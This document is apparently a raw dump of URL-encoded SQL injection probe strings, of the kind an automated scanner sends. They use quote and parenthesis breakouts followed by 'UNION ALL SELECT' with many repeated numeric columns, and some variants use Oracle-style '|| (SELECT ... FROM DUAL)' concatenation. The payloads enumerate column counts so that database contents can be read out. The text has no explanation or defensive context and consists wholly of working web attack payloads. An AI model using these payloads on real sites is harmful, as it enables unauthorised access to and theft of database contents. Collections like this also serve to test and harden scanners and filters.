-8256%27%29%20WHERE%203256%3D3256%20UNION%20ALL%20SELECT%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%2C%203256%23 -5965%27%29%20WHERE%207964%3D7964%20UNION%20ALL%20SELECT%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%2C%207964%23 -4229%27%29%20WHERE%202545%3D2545%20UNION%20ALL%20SELECT%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%2C%202545%23 -2180%27%29%20WHERE%208528%3D8528%20UNION%20ALL%20SELECT%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%2C%208528%23 -1555%27%29%20WHERE%209211%3D9211%20UNION%20ALL%20SELECT%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%2C%209211%23 -8440%27%29%20WHERE%203489%3D3489%20UNION%20ALL%20SELECT%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%2C%203489%23 -5334%27%29%20WHERE%205688%3D5688%20UNION%20ALL%20SELECT%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%2C%205688%23 -6195%27%29%20WHERE%204596%3D4596%20UNION%20ALL%20SELECT%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%2C%204596%23 -1834%27%29%20WHERE%206906%3D6906%20UNION%20ALL%20SELECT%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%2C%206906%23 -6685%27%20WHERE%205436%3D5436%20UNION%20ALL%20SELECT%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%2C%205436%23 -7797%27%20WHERE%203187%3D3187%20UNION%20ALL%20SELECT%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%2C%203187%23 -5117%27%20WHERE%208493%3D8493%20UNION%20ALL%20SELECT%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%2C%208493%23 -1928%27%20WHERE%203902%3D3902%20UNION%20ALL%20SELECT%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%2C%203902%23 -8694%27%20WHERE%209689%3D9689%20UNION%20ALL%20SELECT%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%2C%209689%23 -5037%27%20WHERE%209358%3D9358%20UNION%20ALL%20SELECT%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%2C%209358%23 -4378%27%20WHERE%208771%3D8771%20UNION%20ALL%20SELECT%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%2C%208771%23 -9643%27%20WHERE%202440%3D2440%20UNION%20ALL%20SELECT%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%2C%202440%23 -4728%27%20WHERE%203987%3D3987%20UNION%20ALL%20SELECT%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%2C%203987%23 -1777%27%20WHERE%207608%3D7608%20UNION%20ALL%20SELECT%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%2C%207608%23 -7083%22%20WHERE%206289%3D6289%20UNION%20ALL%20SELECT%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%2C%206289%23 -5996%22%20WHERE%206173%3D6173%20UNION%20ALL%20SELECT%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%2C%206173%23 -2119%22%20WHERE%208454%3D8454%20UNION%20ALL%20SELECT%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%2C%208454%23 -4718%22%20WHERE%204190%3D4190%20UNION%20ALL%20SELECT%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%23 -3940%22%20WHERE%202612%3D2612%20UNION%20ALL%20SELECT%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%23 -3280%22%20WHERE%201397%3D1397%20UNION%20ALL%20SELECT%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%2C%201397%23 -3971%22%20WHERE%208326%3D8326%20UNION%20ALL%20SELECT%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%2C%208326%23 -2956%22%20WHERE%209613%3D9613%20UNION%20ALL%20SELECT%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%2C%209613%23 -5444%22%20WHERE%206126%3D6126%20UNION%20ALL%20SELECT%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%2C%206126%23 -9724%22%20WHERE%201256%3D1256%20UNION%20ALL%20SELECT%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%2C%201256%23 -1086%27%20%7C%7C%20%28SELECT%204200%20FROM%20DUAL%20WHERE%205886%3D5886%20UNION%20ALL%20SELECT%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%2C%205886%23%20%29%20%7C%7C%20%27 -1323%27%20%7C%7C%20%28SELECT%203292%20FROM%20DUAL%20WHERE%205275%3D5275%20UNION%20ALL%20SELECT%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%2C%205275%23%20%29%20%7C%7C%20%27 -5531%27%20%7C%7C%20%28SELECT%208453%20FROM%20DUAL%20WHERE%202401%3D2401%20UNION%20ALL%20SELECT%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%2C%202401%23%20%29%20%7C%7C%20%27 -3675%27%20%7C%7C%20%28SELECT%201723%20FROM%20DUAL%20WHERE%204215%3D4215%20UNION%20ALL%20SELECT%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%2C%204215%23%20%29%20%7C%7C%20%27 -1084%27%20%7C%7C%20%28SELECT%208001%20FROM%20DUAL%20WHERE%201357%3D1357%20UNION%20ALL%20SELECT%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%2C%201357%23%20%29%20%7C%7C%20%27 -7598%27%20%7C%7C%20%28SELECT%201912%20FROM%20DUAL%20WHERE%202674%3D2674%20UNION%20ALL%20SELECT%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%2C%202674%23%20%29%20%7C%7C%20%27 -9904%27%20%7C%7C%20%28SELECT%205742%20FROM%20DUAL%20WHERE%205751%3D5751%20UNION%20ALL%20SELECT%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%2C%205751%23%20%29%20%7C%7C%20%27 -5899%27%20%7C%7C%20%28SELECT%209304%20FROM%20DUAL%20WHERE%205360%3D5360%20UNION%20ALL%20SELECT%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%23%20%29%20%7C%7C%20%27 -7750%27%20%7C%7C%20%28SELECT%201558%20FROM%20DUAL%20WHERE%207026%3D7026%20UNION%20ALL%20SELECT%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%2C%207026%23%20%29%20%7C%7C%20%27 -6172%27%20%7C%7C%20%28SELECT%207683%20FROM%20DUAL%20WHERE%201627%3D1627%20UNION%20ALL%20SELECT%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627%23%20%29%20%7C%7C%20%27 -2985%27%20%7C%7C%20%28SELECT%209200%20WHERE%205429%3D5429%20UNION%20ALL%20SELECT%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%2C%205429%23%20%29%20%7C%7C%20%27 -9713%27%20%7C%7C%20%28SELECT%202291%20WHERE%205014%3D5014%20UNION%20ALL%20SELECT%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%2C%205014%23%20%29%20%7C%7C%20%27 -9321%27%20%7C%7C%20%28SELECT%202435%20WHERE%205263%3D5263%20UNION%20ALL%20SELECT%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%2C%205263%23%20%29%20%7C%7C%20%27 -2651%27%20%7C%7C%20%28SELECT%202088%20WHERE%209025%3D9025%20UNION%20ALL%20SELECT%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%2C%209025%23%20%29%20%7C%7C%20%27 -4949%27%20%7C%7C%20%28SELECT%209131%20WHERE%204397%3D4397%20UNION%20ALL%20SELECT%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%2C%204397%23%20%29%20%7C%7C%20%27 -4260%27%20%7C%7C%20%28SELECT%203290%20WHERE%203306%3D3306%20UNION%20ALL%20SELECT%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%2C%203306%23%20%29%20%7C%7C%20%27 -7563%27%20%7C%7C%20%28SELECT%207359%20WHERE%209503%3D9503%20UNION%20ALL%20SELECT%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%2C%209503%23%20%29%20%7C%7C%20%27 